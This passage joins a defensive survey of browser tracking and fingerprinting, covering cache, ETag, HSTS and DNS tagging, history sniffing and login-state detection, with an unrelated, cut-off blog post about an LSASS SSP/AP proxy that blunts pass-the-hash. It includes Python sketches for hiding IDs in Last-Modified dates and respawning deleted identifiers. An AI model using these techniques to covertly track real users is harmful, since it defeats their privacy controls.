We believe that the availability of any one of these mechanisms is sufficient to reliably tag clients and identify them later on; in addition to this, many such identifiers can be deployed in a manner that conceals the uniqueness of the ID assigned to a particular client. On the flip side, browsers provide users with some degree of control over the behavior of at least some of these APIs, and with several exceptions discussed later on, the identifiers assigned in this fashion do not propagate to other browser profiles or to private browsing sessions. The remainder of this section provides a more in-depth overview of several notable examples of client tagging schemes that are within the reach of web apps.
HTTP cookies
HTTP cookies are the most familiar and best-understood method for persisting data on the client. In essence, any web server may issue unique identifiers to first-time visitors as a part of a HTTP response, and have the browser play back the stored values on all future requests to a particular site. All major browsers have for years been equipped with UIs for managing cookies; a large number of third-party cookie management and blocking tools is available, too.
In practice, however, external research has implied that only a minority of users regularly review or purge browser cookies. The reasons for this are probably complex, but one of them may be that the removal of cookies tends to be disruptive: contemporary browsers do not provide any heuristics to distinguish between the session cookies that are needed to access the sites the user is logged into, and the rest. Some browsers offer user-configurable restrictions on the ability of websites to set “third-party” cookies (that is, cookies coming from a domain other than the one currently displayed in the address bar - a behavior most commonly employed to serve online ads or other embedded content). It should be noted that the existing implementations of this setting will assign the “first-party” label to any cookies set by documents intentionally navigated to by the user, as well as to ones issued by content loaded by the browser as a part of full-page interstitials, HTTP redirects, or click-triggered pop-ups. Compared to most other mechanisms discussed below, overt use of HTTP cookies is fairly transparent to the user. That said, the mechanism may be used to tag clients without the use of cookie values that obviously resemble unique IDs. For example, client identifiers could be encoded as a combination of several seemingly innocuous and reasonable cookie names, or could be stored in metadata such as paths, domains, or cookie expiration times. Because of this, we are not aware of any means for a browser to reliably flag HTTP cookies employed to identify a specific client in this manner. Just as interestingly, the abundance of cookies means that an actor could even conceivably rely on the values set by others, rather than on any newly-issued identifiers that could be tracked directly to the party in question.
We have seen this employed for some rich content ads, which are usually hosted in a single origin shared by all advertisers - or, less safely, are executed directly in the context of the page that embeds the ad.

Flash LSOs

Local Shared Objects are the canonical way to store client-side data within Adobe Flash. The mechanism is designed to be a direct counterpart to HTTP cookies, offering a convenient way to maintain session identifiers and other application state on a per-origin basis. In contrast to cookies, LSOs can also be used for structured storage of data other than short snippets of text, making such objects more difficult to inspect and analyze in a streamlined way. In the past, the behavior of LSOs within the Flash plugin had to be configured separately from any browser privacy settings, by visiting a lesser-known Flash Settings Manager UI hosted on macromedia.com (standalone installs of Flash 10.3 and above supplanted this with a Control Panel / System Preferences dialog available locally on the machine). Today, most browsers offer a degree of integration: for example, clearing cookies and other site data will generally also remove LSOs. On the flip side, more nuanced controls may not be synchronized: say, the specific setting for third-party cookies in the browser is not always reflected by the behavior of LSOs. From a purely technical standpoint, the use of Local Shared Objects in a manner similar to HTTP cookies is within the apparent design parameters for this API - but the reliance on LSOs to recreate deleted cookies or bypass browser cookie preferences has been subject to public scrutiny.

Silverlight Isolated Storage

Microsoft Silverlight is a widely-deployed applet framework bearing many similarities to Adobe Flash. The Silverlight equivalent of Flash LSOs is known as Isolated Storage. The privacy settings in Silverlight are typically not coupled to the underlying browser.
In our testing, values stored in Isolated Storage survive clearing the cache and site data in Chrome, Internet Explorer, and Firefox. Perhaps more surprisingly, Isolated Storage also appears to be shared between all non-incognito browser windows and browser profiles installed on the same machine; this may have consequences for users who rely on separate browser instances to maintain distinct online identities. As with LSOs, reliance on Isolated Storage to store session identifiers and similar state information does not present issues from a purely technical standpoint. That said, given that the mechanism is not currently managed via browser controls, its use for client identification is not commonplace and thus may be viewed as less transparent than standard cookies.

HTML5 client-side storage mechanisms

HTML5 introduces a range of structured data storage mechanisms on the client; this includes localStorage, the File API, and IndexedDB. Although semantically different from each other, all of them are designed to allow persistent storage of arbitrary blobs of binary data tied to a particular web origin. In contrast to cookies and LSOs, there are no significant size restrictions on the data stored with these APIs. In modern browsers, HTML5 storage is usually purged alongside other site data, but the mapping to browser settings isn’t necessarily obvious. For example, Firefox will retain localStorage data unless the user selects “offline website data” or “site preferences” in the deletion dialog and specifies the time range as “everything” (this is not the default). Another idiosyncrasy is the behavior of Internet Explorer, where the data is retained for the lifetime of a tab for any sites that are open at the time the operation takes place. Beyond that, the mechanisms do not always appear to follow the restrictions on persistence that apply to HTTP cookies.
For example, in our testing, in Firefox, localStorage can be written and read in cross-domain frames even if third-party cookies are disabled. Due to the similarity of the design goals of these APIs, the authors expect that the perception and the caveats of using HTML5 storage for storing session identifiers would be similar to the situation with Flash and Silverlight.

Cached objects

For performance reasons, all mainstream web browsers maintain a global cache of previously retrieved HTTP resources. Although this mechanism is not explicitly designed as a random-access storage mechanism, it can be easily leveraged as such. To accomplish this, a cooperating server may return, say, a JavaScript document with a unique identifier embedded in its body, and set the Expires / max-age= headers to a date in the distant future. Once this unique identifier is stored within a script subresource in the browser cache, the ID can be read back on any page on the Internet simply by loading the script from a known URL and monitoring the agreed-upon local variable or setting up a predefined callback function in JavaScript. The browser will periodically check for newer copies of the script by issuing a conditional request to the originating server with a suitable If-Modified-Since header; but if the server consistently responds to such checks with HTTP code 304 (“Not Modified”), the old copy will continue to be reused indefinitely. There is no concept of blocking “third-party” cache objects in any browser known to the authors of this document, and no simple way to prevent cache objects from being stored without dramatically degrading the performance of everyday browsing. Automated detection of such behaviors is extremely difficult owing to the sheer volume and complexity of cached JavaScript documents encountered on the modern Web. All browsers expose the option to manually clear the document cache.
That said, because clearing the cache requires specific action on the part of the user, it is unlikely to be done regularly, if at all. Leveraging the browser cache to store session identifiers is very distinct from using HTTP cookies; the authors are unsure if and how the cookie settings - the convenient abstraction layer used for most of the other mechanisms discussed to date - could map to the semantics of browser caches.

Cache metadata: ETag and Last-Modified

To make implicit browser-level document caching work properly, servers must have a way to notify browsers that a newer version of a particular document is available for retrieval. The HTTP/1.1 standard specifies two methods of document versioning: one based on the date of the most recent modification, and another based on an abstract, opaque identifier known as ETag. In the ETag scheme, the server initially returns an opaque “version tag” string in a response header alongside the actual document. On subsequent conditional requests to the same URL, the client echoes back the value associated with the copy it already has, through an If-None-Match header; if the version specified in this header is still current, the server will respond with HTTP code 304 (“Not Modified”) and the client is free to reuse the cached document. Otherwise, a new document with a new ETag will follow. Interestingly, the behavior of the ETag header closely mimics that of HTTP cookies: the server can store an arbitrary, persistent value on the client, only to read it back later on. This observation, and its potential applications for browser tracking, date back at least to 2000. The other versioning scheme, Last-Modified, suffers from the same issue: servers can store at least 32 bits of data within a well-formed date string, which will then be echoed back by the client through a request header known as If-Modified-Since. (In practice, most browsers don't even require the string to be a well-formed date to begin with.)
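To make the Last-Modified trick concrete, here is a hedged sketch of one possible encoding: the server uses a 32-bit client identifier directly as a Unix timestamp, serves it as a well-formed date, and later recovers it from the If-Modified-Since value the browser echoes back. The header names are real; the encoding scheme itself is purely illustrative:

```python
from email.utils import formatdate, parsedate_to_datetime

def encode_id_as_last_modified(client_id):
    """Pack a 32-bit identifier into a syntactically valid HTTP date by
    treating it as a Unix timestamp (seconds since 1970)."""
    assert 0 <= client_id < 2**32
    return formatdate(client_id, usegmt=True)

def decode_id_from_if_modified_since(header_value):
    """Recover the identifier from the date the client echoes back."""
    return int(parsedate_to_datetime(header_value).timestamp())

stamp = encode_id_as_last_modified(0xDEADBEEF)  # looks like an ordinary date
assert decode_id_from_if_modified_since(stamp) == 0xDEADBEEF
```

Nothing about the resulting header looks anomalous to the client, which is precisely what makes this channel hard to flag.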
Similarly to tagging users through cache objects, both of these “metadata” mechanisms are unaffected by the deletion of cookies and related site data; the tags can be destroyed only by purging the browser cache. As with Flash LSOs, the use of ETag to allegedly skirt browser cookie settings has been subject to scrutiny.

HTML5 AppCache

Application Caches allow website authors to specify that portions of their websites should be stored on the disk and made available even if the user is offline. The mechanism is controlled by cache manifests that outline the rules for storing and retrieving cache items within the app. Similarly to implicit browser caching, AppCaches make it possible to store unique, user-dependent data - be it inside the cache manifest itself, or inside the resources it requests. The resources are retained indefinitely and are not subject to the browser’s usual cache eviction policies. AppCache appears to occupy a netherworld between HTML5 storage mechanisms and the implicit browser cache. In some browsers, it is purged along with cookies and stored website data; in others, it is discarded only if the user opts to delete the browsing history and all cached documents. Note: AppCache is likely to be succeeded by Service Workers; the privacy properties of both mechanisms are likely to be comparable.

Flash resource cache

Flash maintains its own internal store of resource files, which can be probed using a variety of techniques. In particular, the internal repository includes an asset cache, relied upon to store Runtime Shared Libraries signed by Adobe to improve applet load times. There is also Adobe Flash Access, a mechanism to store automatically acquired licenses for DRM-protected content. As of this writing, these document caches do not appear to be coupled to any browser privacy settings and can only be deleted by making several independent configuration changes in the Flash Settings Manager UI on macromedia.com.
We believe there is no global option to delete all cached resources or prevent them from being stored in the future. Browsers other than Chrome appear to share Flash asset data across all installations and in private browsing modes, which may have consequences for users who rely on separate browser instances to maintain distinct online identities.

SDCH dictionaries

SDCH is a Google-developed compression algorithm that relies on the use of server-supplied, cacheable dictionaries to achieve compression rates considerably higher than what’s possible with methods such as gzip or deflate for several common classes of documents. The site-specific dictionary caching behavior at the core of SDCH inevitably offers an opportunity for storing unique identifiers on the client: both the dictionary IDs (echoed back by the client using the Avail-Dictionary header), and the contents of the dictionaries themselves, can be used for this purpose, in a manner very similar to the regular browser cache. In Chrome, the data does not persist across browser restarts; it was, however, shared between profiles and incognito modes, and was not deleted with other site data when such an operation was requested by the user. Google addressed this in bug 327783.

Other script-accessible storage mechanisms

Several other, more limited techniques make it possible for JavaScript or other active content running in the browser to maintain and query client state, sometimes in a fashion that can survive attempts to delete all browsing and site data. For example, it is possible to use window.name or sessionStorage to store persistent identifiers for a given window: if a user deletes all client state but does not close a tab that at some point in the past displayed a site determined to track the browser, re-navigation to any participating domain will allow the window-bound token to be retrieved and the new session to be associated with the previously collected data.
More obviously, the same is true for active JavaScript: any currently open JavaScript context is allowed to retain state even if the user attempts to delete local site data; this can be done not only by the top-level sites open in the currently-viewed tabs, but also by “hidden” contexts such as HTML frames, web workers, and pop-unders. This can happen by accident: for example, a running ad loaded in an <iframe> may remain completely oblivious to the fact that the user attempted to clear all browsing history, and keep using a session ID stored in a local variable in JavaScript. (In fact, in addition to JavaScript, Internet Explorer will also retain session cookies for the currently-displayed origins.) Another interesting and often-overlooked persistence mechanism is the caching of RFC 2617 HTTP authentication credentials: once explicitly passed in a URL, the cached values may be sent on subsequent requests even after all the site data is deleted in the browser UI. In addition to the cross-browser approaches discussed earlier in this document, there are also several proprietary APIs that can be leveraged to store unique identifiers on the client system. An interesting example of this is the set of proprietary persistence behaviors in some versions of Internet Explorer, including the userData API. Last but not least, a variety of other, less common plugins and plugin-mediated interfaces likely expose analogous methods for storing data on the client, but have not been studied in detail as a part of this write-up; an example of this may be the PersistenceService API in Java, or the DRM license management mechanisms within Silverlight.
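The common thread of the mechanisms above is redundancy: a script that writes the same identifier into several independent stores can "respawn" it as long as any single copy survives a cleanup. A hedged sketch of that logic, with the concrete storage mechanisms abstracted away as plain dictionaries:

```python
import secrets

# Stand-ins for independent client-side stores (cookies, Flash LSOs,
# localStorage, cache objects, ...) - purely illustrative.
stores = {"cookies": {}, "lso": {}, "local_storage": {}, "cache": {}}

def respawn_identifier():
    """Read the ID back from any store that still has it, then rewrite it
    everywhere, resurrecting any copies the user deleted."""
    survivor = next((s["uid"] for s in stores.values() if "uid" in s), None)
    uid = survivor if survivor is not None else secrets.token_hex(8)
    for s in stores.values():
        s["uid"] = uid
    return uid

first = respawn_identifier()
stores["cookies"].clear()        # the user clears cookies...
stores["local_storage"].clear()  # ...and HTML5 storage, but misses the LSO
assert respawn_identifier() == first  # the identifier survives anyway
```

This is why clearing any single category of site data offers little protection against a determined tracker: every surviving store re-seeds all the others on the next visit.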
Lower-level protocol identifiers

On top of the fingerprinting mechanisms associated with HTTP caching and with the purpose-built APIs available to JavaScript programs and plugin-executed code, modern browsers provide several network-level features that offer an opportunity to store or retrieve unique identifiers:

- Origin Bound Certificates (aka ChannelID) are persistent self-signed certificates identifying the client to an HTTPS server, envisioned as the future of session management on the web. A separate certificate is generated for every newly encountered domain and reused for all connections initiated later on. By design, OBCs function as unique and stable client fingerprints, essentially replicating the operation of authentication cookies; they are treated as “site and plug-in data” in Chrome, and can be removed along with cookies. Uncharacteristically, sites can leverage OBCs for user tracking without performing any actions that would be visible to the client: the ID can be derived simply by taking note of the cryptographic hash of the certificate automatically supplied by the client as a part of a legitimate SSL handshake. ChannelID is currently suppressed in Chrome in “third-party” scenarios (e.g., for different-domain frames).
- The set of supported ciphersuites can be used to fingerprint a TLS/SSL handshake. Note that clients have been actively deprecating various ciphersuites in recent years, making this attack even more powerful.
- In a similar fashion, two separate mechanisms within TLS - session identifiers and session tickets - allow clients to resume previously terminated HTTPS connections without completing a full handshake; this is accomplished by reusing previously cached data. These session resumption protocols provide a way for servers to identify subsequent requests originating from the same client for a short period of time.
- HTTP Strict Transport Security is a security mechanism that allows servers to demand that all future connections to a particular host name happen exclusively over HTTPS, even if the original URL nominally begins with “http://”. It follows that a fingerprinting server could set long-lived HSTS headers for a distinctive set of attacker-controlled host names for each newly encountered browser; this information could then be retrieved by loading faux (but possibly legitimate-looking) subresources from all the designated host names and seeing which of the connections are automatically switched to HTTPS. In an attempt to balance security and privacy, any HSTS pins set during normal browsing are carried over to incognito mode in Chrome; there is no propagation in the opposite direction, however. It is worth noting that leveraging HSTS for tracking purposes would require establishing log(n) connections to uniquely identify n users, which makes it relatively unattractive, except for targeted uses; that said, creating a smaller number of buckets may be a valuable tool for refining other imprecise fingerprinting signals across a very large user base.
- Last but not least, virtually all modern browsers maintain internal DNS caches to speed up name resolution (and, in some implementations, to mitigate the risk of DNS rebinding attacks). Such caches can be easily leveraged to store small amounts of information for a configurable amount of time; for example, with 16 available IP addresses to choose from, around 8-9 cached host names would be sufficient to uniquely identify every computer on the Internet. On the flip side, the value of this approach is limited by the modest size of browser DNS caches and the potential conflicts with resolver caching at the ISP level.
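The arithmetic behind the last two techniques can be sketched as follows: each HSTS-pinned host name contributes one bit (pin set or absent), while each cached DNS entry that can resolve to one of 16 addresses contributes four bits. The client population figure below is illustrative:

```python
import math

def hostnames_needed_hsts(n_users):
    """Each attacker-controlled host name stores one bit (HSTS pin set
    or not), so ceil(log2(n)) names distinguish n users."""
    return math.ceil(math.log2(n_users))

def hostnames_needed_dns(n_users, addresses_per_name=16):
    """Each cached host name encodes log2(addresses_per_name) bits via
    the IP address it happened to resolve to."""
    bits_per_name = math.log2(addresses_per_name)
    return math.ceil(math.log2(n_users) / bits_per_name)

# With roughly 2^32 clients (on the order of the IPv4 address space):
assert hostnames_needed_hsts(2**32) == 32
assert hostnames_needed_dns(2**32) == 8
```

This is the sense in which HSTS tagging needs log(n) connections per client, and why a mere 8-9 DNS-cached host names suffice for a globally unique tag.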
Machine-specific characteristics

With the notable exception of Origin-Bound Certificates, the techniques described in section 1 of the document rely on a third-party website explicitly placing a new unique identifier on the client system. Another, less obvious approach to web tracking relies on querying or indirectly measuring the inherent characteristics of the client system. Individually, each such signal will reveal just several bits of information - but when combined together, it seems probable that they may uniquely identify almost any computer on the Internet. In addition to being harder to detect or stop, such techniques could be used to cross-correlate user activity across various browser profiles or private browsing sessions. Furthermore, because the techniques are conceptually very distant from HTTP cookies, the authors find it difficult to decide how, if at all, the existing cookie-centric privacy controls in the browser should be used to govern such practices. EFF Panopticlick is one of the most prominent experiments demonstrating the principle of combining low-value signals into a high-accuracy fingerprint; there is also some evidence of sophisticated passive fingerprints being used by commercial tracking services.

Browser-level fingerprints

The most straightforward approach to fingerprinting is to construct identifiers by actively and explicitly combining a range of individually non-identifying signals available within the browser environment:

- User-Agent string, identifying the browser version, OS version, and some of the installed browser add-ons. (In cases where User-Agent information is not available or imprecise, browser versions can usually be inferred very accurately by examining the structure of other headers and by testing for the availability and semantics of the features introduced or modified between releases of a particular browser.)
- Clock skew and drift: unless synchronized with an external time source, most systems exhibit clock drift that, over time, produces a fairly unique time offset for every machine. Such offsets can be measured with microsecond precision using JavaScript. In fact, even in the case of NTP-synchronized clocks, ppm-level skews may be possible to measure remotely.
- Fairly fine-grained information about the underlying CPU and GPU, either as exposed directly (GL_RENDERER) or as measured by executing JavaScript benchmarks and testing for driver- or GPU-specific differences in WebGL rendering or the application of ICC color profiles to <canvas> data.
- Screen and browser window resolutions, including parameters of secondary displays for multi-monitor users.
- The window-manager- and addon-specific “thickness” of the browser UI in various settings (e.g., window.outerHeight - window.innerHeight).
- The list and ordering of installed system fonts - enumerated directly or inferred with the help of an API such as getComputedStyle.
- The list of all installed plugins, ActiveX controls, and Browser Helper Objects, including their versions - queried or brute-forced through navigator.plugins[]. (Some add-ons also announce their existence in HTTP headers.)
- Information about installed browser extensions and other software. While the set cannot be directly enumerated, many extensions include web-accessible resources that aid in fingerprinting. In addition to this, add-ons such as popular ad blockers make detectable modifications to viewed pages, revealing information about the extension or its configuration. Using browser “sync” features may result in these characteristics being identical for a given user across multiple devices. A similar but less portable approach specific to Internet Explorer allows websites to enumerate locally installed software by attempting to load DLL resources via the res:// pseudo-protocol.
- Random seeds reconstructed from the output of non-cryptosafe PRNGs (e.g., Math.random(), multipart form boundaries, etc.). In some browsers, the PRNG is initialized only at startup, or reinitialized using values that are system-specific (e.g., based on system time or PID).

According to the EFF, their Panopticlick experiment - which combines only a relatively small subset of the actively-probed signals discussed above - is able to uniquely identify 95% of desktop users based on system-level metrics alone. Current commercial fingerprinters are reported to be considerably more sophisticated, and their developers might be able to claim significantly higher success rates. Of course, the value of some of the signals discussed here will be diminished on mobile devices, where both the hardware and the software configuration tend to be more homogenous; for example, measuring window dimensions or the list of installed plugins offers very little data on most Android devices. Nevertheless, we feel that the remaining signals - such as clock skew and drift, and the network-level and user-specific signals described later on - are together likely more than sufficient to uniquely identify virtually all users. When discussing potential mitigations, it is worth noting that restrictions such as disallowing the enumeration of navigator.plugins[] generally do not prevent fingerprinting; the set of all notable plugins and fonts ever created and distributed to users is relatively small, and a malicious script can conceivably test for every possible value in very little time.

Network configuration fingerprints

An interesting set of additional device characteristics is associated with the architecture of the local network and the configuration of lower-level network protocols; such signals are disclosed independently of the design of the web browser itself. The traits covered here are generally shared between all browsers on a given client and cannot be easily altered by common privacy-enhancing tools or practices; they include:

- The external client IP address. For IPv6 addresses, this vector is even more interesting: in some settings, the last octets may be derived from the device's MAC address and preserved across networks.
- A broad range of TCP/IP and TLS stack fingerprints, obtained with passive tools such as p0f. The information disclosed on this level is often surprisingly specific: for example, TCP/IP traffic will often reveal high-resolution system uptime data through TCP timestamps.
- Ephemeral source port numbers for outgoing TCP/IP connections, generally selected sequentially by most operating systems.
- The local network IP address for users behind network address translation or HTTP proxies (via WebRTC). Combined with the external client IP, the internal NAT IP uniquely identifies most users, and is generally stable for desktop browsers (due to the tendency of DHCP clients and servers to cache leases).
- Information about proxies used by the client, as detected from the presence of extra HTTP headers (Via, X-Forwarded-For). This can be combined with the client’s actual IP address, revealed when making proxy-bypassing connections using one of several available methods.
- With active probing, the list of open ports on the local host, indicating other installed software and firewall settings on the system. Unruly actors may also be tempted to probe the systems and services in the visitor’s local network; doing so directly within the browser will circumvent any firewalls that normally filter out unwanted incoming traffic.

User-dependent behaviors and preferences

In addition to trying to uniquely identify the device used to browse the web, some parties may opt to examine characteristics that aren’t necessarily tied to the machine, but that are closely associated with specific users, their local preferences, and the online behaviors they exhibit. Similarly to the methods described in section 2, such patterns would persist across different browser sessions, profiles, and across the boundaries of private browsing modes.
The following data is typically open to examination:

- Preferred language, default character encoding, and local time zone (sent in HTTP headers and visible to JavaScript).
- Data in the client cache and history. It is possible to detect items in the client’s cache by performing simple timing attacks; for any long-lived cache items associated with popular destinations on the Internet, a fingerprinter could detect their presence simply by measuring how quickly they load (and by aborting the navigation if the latency is greater than expected for a local cache). (It is also possible to directly extract URLs stored in the browsing history, although such an attack requires some user interaction in modern browsers.)
- Mouse gestures, keystroke timing and velocity patterns, and accelerometer readings (ondeviceorientation) that are unique to a particular user or to particular surroundings. There is a considerable body of scientific research suggesting that even relatively trivial interactions are deeply user-specific and highly identifying.
- Any changes to default website fonts and font sizes, website zoom level, and the use of any accessibility features such as text color, size, or CSS overrides (all indirectly measurable with JavaScript).
- The state of client features that can be customized or disabled by the user, with special emphasis on mechanisms such as DNT, third-party cookie blocking, changes to DNS prefetching, pop-up blocking, Flash security and content storage, and so on. (In fact, users who extensively tweak their settings from the defaults may actually be making their browsers considerably easier to uniquely fingerprint.)
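In practice, signals like these are combined with the machine-specific characteristics from section 2 by canonicalizing the collected attributes and hashing them into a single fingerprint, with each attribute contributing a few bits of entropy. A simplified sketch - the attribute names and per-signal entropy figures below are hypothetical:

```python
import hashlib
import json

def fingerprint(signals):
    """Hash a canonical serialization of the collected attributes into
    a single stable identifier."""
    canonical = json.dumps(signals, sort_keys=True)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()

def total_entropy_bits(per_signal_bits):
    """Bits from (roughly) independent signals simply add up."""
    return sum(per_signal_bits)

fp = fingerprint({
    "user_agent": "Mozilla/5.0 (X11; Linux x86_64) ...",  # hypothetical values
    "screen": "2560x1440x24",
    "timezone": "UTC+2",
    "fonts": ["Arial", "DejaVu Sans", "Noto Color Emoji"],
})
assert len(fp) == 64  # a stable 256-bit digest of the combined signals

# Hypothetical per-signal entropy estimates: even a handful of weak
# signals already yields more than 2^30 distinguishable configurations.
assert total_entropy_bits([10.0, 4.8, 3.0, 13.9]) > 30
```

The identifier is stable for as long as the underlying configuration does not change, which is what allows it to survive cookie deletion and private browsing modes.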
On top of this, user fingerprinting can be accomplished by interacting with third-party services through the user’s browser, using the ambient credentials (HTTP cookies) maintained by the browser:

- Users logged into websites that offer collaboration features can be de-anonymized by covertly instructing their browser to navigate to a set of distinctively ACLed resources and then examining which of these navigation attempts result in a new collaborator showing up in the UI.
- Request timing, onerror and onload handlers, and similar measurement techniques can be used to detect which third-party resources return HTTP 403 error codes in the user’s browser, thus constructing an accurate picture of which sites the user is logged into; in some cases, finer-grained insights into user settings or preferences on the site can be obtained, too. (A similar but possibly more versatile login-state attack can also be mounted with the help of Content Security Policy, a new security mechanism introduced in modern browsers.)
- Any of the explicit web application APIs that allow identity attestation may be leveraged to confirm the identity of the current user (typically based on a starting set of probable guesses).

Fingerprinting prevention and detection challenges

In a world with no possibility of fingerprinting, web browsers would be indistinguishable from each other, with the exception of a small number of robustly compartmentalized and easily managed identifiers used to maintain login state and implement other essential features in response to the user’s intent. In practice, the Web is very different: browser tracking and fingerprinting are attainable in a large number of ways. A number of the unintentional tracking vectors are a product of implementation mistakes or oversights that could conceivably be corrected today; many others are virtually impossible to fully rectify without completely changing the way that browsers, web applications, and computer networks are designed and operated.
In fact, some of these design decisions might have played an unlikely role in the success of the Web. In lieu of eliminating the possibility of web tracking, some have raised the hope of detecting the use of fingerprinting in the online ecosystem and bringing it to public attention via technical means, through browser- or server-side instrumentation. Nevertheless, even this simple concept runs into a number of obstacles:

- Some fingerprinting techniques simply leave no remotely measurable footprint, thus precluding any attempts to detect them in an automated fashion.
- Most other fingerprinting and tagging vectors are used in fairly evident ways, but could be easily redesigned so that they are practically indistinguishable from unrelated types of behavior. This would frustrate any programmatic detection strategies in the long haul, particularly if they are attempted on the client (where the party seeking to avoid detection can reverse-engineer the checks and iterate until the behavior is no longer flagged as suspicious).
- The distinction between behaviors that may be acceptable to the user and ones that might not is hidden from view: for example, a cookie set for abuse detection looks the same as a cookie set to track online browsing habits. Without a way to distinguish between the two and properly classify the observed behaviors, tracking detection mechanisms may provide little real value to the user.

Potential directions for future work

There may be no simple, universal, technical solutions to the problem of tracking on the Web by parties who are intent on doing so with no regard for user controls.
That said, the authors of this page see some theoretical room for improvement when it comes to building simpler and more intuitive privacy controls to provide a better framework for the bulk of interactions with responsible sites and parties on the Internet:

- The current browser privacy controls evolved almost exclusively around the notion of HTTP cookies and several other very specific concepts that do not necessarily map cleanly to many of the tracking and fingerprinting methods discussed in this document. In light of this, to better meet user expectations, it may be beneficial for in-browser privacy settings to focus on clearly explaining practical privacy outcomes, rather than continuing to build on top of narrowly-defined concepts such as "third-party cookies".
- We worry that in some cases, interacting with browser privacy controls can degrade one’s browsing experience, discouraging the user from ever touching them. A canonical example of this is trying to delete cookies: reviewing them manually is generally impractical, while deleting all cookies will kick the user out of any sites he or she is logged into and frequents every day. Although fraught with some implementation challenges, it may be desirable to build better heuristics that distinguish and preserve site data specifically for the destinations that users frequently log into or meaningfully interact with.
- Even for extremely privacy-conscious users who are willing to put up with the inconvenience of deleting their cookies and purging other session data, resetting online fingerprints can be difficult and fail in unexpected ways. An example of this is discussed in section 1: if there are ads loaded on any of the currently open tabs, clearing all local data may not actually result in a clean slate. Investing in developing technologies that provide more robust and intuitive ways to maintain, manage, or compartmentalize one's online footprints may be a noble goal.
Today, some privacy-conscious users may resort to tweaking multiple settings and installing a broad range of extensions that together have the paradoxical effect of facilitating fingerprinting - simply by making their browsers considerably more distinctive, no matter where they go. There is a compelling case for improving the clarity and effect of a handful of well-defined privacy settings so as to limit the probability of such outcomes. We present these ideas for discussion within the community; at the same time, we recognize that although they may sound simple when expressed in a single paragraph, their technical underpinnings are elusive and may prove difficult or impossible to fully flesh out and implement in any browser.

Sursa: http://www.chromium.org/Home/chromium-security/client-identification-mechanisms
  8. Using an SSP/AP LSASS Proxy to Mitigate Pass-the-Hash Pre-Windows 8.1

mit·i·gate
verb
make less severe, serious, or painful. "he wanted to mitigate misery in the world"
synonyms: alleviate, reduce, diminish, lessen, weaken, lighten, attenuate, take the edge off, allay, ease, assuage, palliate, relieve, tone down

Intro

A colleague (Matt Weeks/scriptjunkie) guest posted an article on the passing-the-hash blog (@passingthehash) about March being Pass-the-Hash awareness month, updating us on where we stand today regarding the family of issues. I thought this would be a good subject for an opening post. This post mostly concerns pre-Windows 8.1 systems that use Smart Cards and Kerberos as their primary form of authentication. It may apply to other configurations as well. This post covers the very basics of what I did to create a custom Security Support Provider/Authentication Package (SSP/AP) as a proxy in order to help mitigate the problem of LSASS storing NTLM credentials in its memory space. This technique should probably only be used when your primary mode of authentication is something other than NTLM, such as Kerberos, as it will prevent LSASS from properly caching NTLM credentials on the client for later use. While this does not solve the problem and is by no means a perfect solution (that probably has to come from Microsoft), it will at least offer some protection against some of the low hanging fruit attacks.

Kerberos and NTLM Hashes

Many believe that the solution to Pass-the-Hash is to simply require Kerberos on their network for authentication, thus moving the problem to Pass-the-Ticket. What they don't realize is that the system also generates an NTLM hash that is stored in the LSASS memory, even when it is not used. 
Without going into too much detail, as it's documented elsewhere (see references below), the gist is that the key distribution center provides a hash of the user's credentials to be stored by the client's LSASS in case Kerberos is later unavailable, in which case the client will revert to using the hash for single-sign-on logins/authentication. Because of this, even on a domain that requires Kerberos to login and access network resources, a backup hash is readily available for stealing. The end effect is that, from an attacker's perspective, not much has changed. Any local logins will have their user credential hash stored in the LSASS memory for at least some time, as will any remote desktop logins to that system (such as domain admins/privileged users). All the attacker needs to do is grab those hashes from LSASS memory and continue. This was the problem that we were trying to mitigate on the client machines. We'll come back to this...

SSP/AP and SSP Proxies

What are SSP/APs and SSPs? SSP/APs and SSPs are described on Microsoft's SSP/APs vs SSPs page, but basically they are packages (DLLs) that are loaded by LSASS upon start which can be used for various security mechanisms such as authentication, message integrity, and encryption. Microsoft provides a couple with Windows, including msv1_0.dll (local interactive logins and NTLM authentication, among others) and kerberos.dll (Kerberos). Microsoft also allows custom SSP/APs and SSPs to be registered and loaded by LSASS as such:

To register an SSP/AP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Authentication Packages.
To register an SSP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages.

For each package registered, a DLL with that package name (ex: mypackage = mypackage.dll) must exist in the Windows\System32 directory. 
Once the system restarts, LSASS will load the packages found in those two registry keys and use them as described in the SSP/AP and SSP documentation.

What is an SSP/AP or SSP Proxy?

While researching the LSASS authentication flow and components, I came across a blog by Koby Kahane (Implementing an LSA proxy authentication package) describing how he implemented an LSA proxy authentication package. He did quite a bit of research into proxying msv1_0 in order to test the feasibility of adding additional authentication steps prior to passing control to the original package. When I saw this, one of the first things to come to mind was how I could use this technique to stop LSASS from caching credentials that I did not want used on the domain.

Authentication Flow

The flow of control through MSV1_0 and Kerberos isn't really documented very much (not at all officially), so I had to start mostly from scratch in order to identify where the credentials passed in order to determine the easiest locations to grab them. The key function appeared to be LsaApLogonUserEx2 in both Kerberos and MSV1_0. This is where much of the original work is done and where the credentials are returned from, initially. Once the call is made into Kerberos at this function, the credentials are gathered and returned back out to LSASS. Supplemental credentials gathered at this point will be sent to the appropriate security packages registered to handle them (such as MSV1_0 for NTLM) via the SpAddCredentials function. There they are processed by their respective security packages and at a point near the end are fired off to LSASS via the AddCredential function. Note: The order of those two may be reversed, as it has been quite some time since I did this. This gave me several points in the chain where I was able to intercept and modify the hash in order to make it unusable before it was cached. 
Building and Using the Proxies

After a colleague and I combed through the information, I decided that I could create a custom proxy in order to keep LSASS from caching the NTLM hashes that Kerberos added as supplemental credentials. There were two places of interest where I could have scrambled the incoming NTLM hash before it was stored. First, I could proxy the Kerberos module and scramble the NTLM hash before it was sent back to LSASS and into the MSV1_0 module, or I could catch it as it was coming into MSV1_0 from Kerberos (as well as from any other source). I decided that I would create a proxy for each 'just in case' and then choose one of them after testing, as I felt that the less I messed around with Microsoft's subsystems the less chance something would go wrong. I created two proxies, one for the SSP/AP msv1_0.dll and another for the SSP kerberos.dll. I really needed to handle two different sets of calls. The first set was through the recommended use of the SpLsaModeInitialize and SpUserModeInitialize functions as described by Koby and the MSDN documentation, requiring you to create and populate the function tables accordingly, replacing any proxied functions with your own. The second method was by exporting and proxying the functions available in the original DLLs (such as through jmp tables initialized upon load) for any application that may bypass the tables entirely (don't always count on other programs to do things the way they are supposed to do them).

MSV1_0

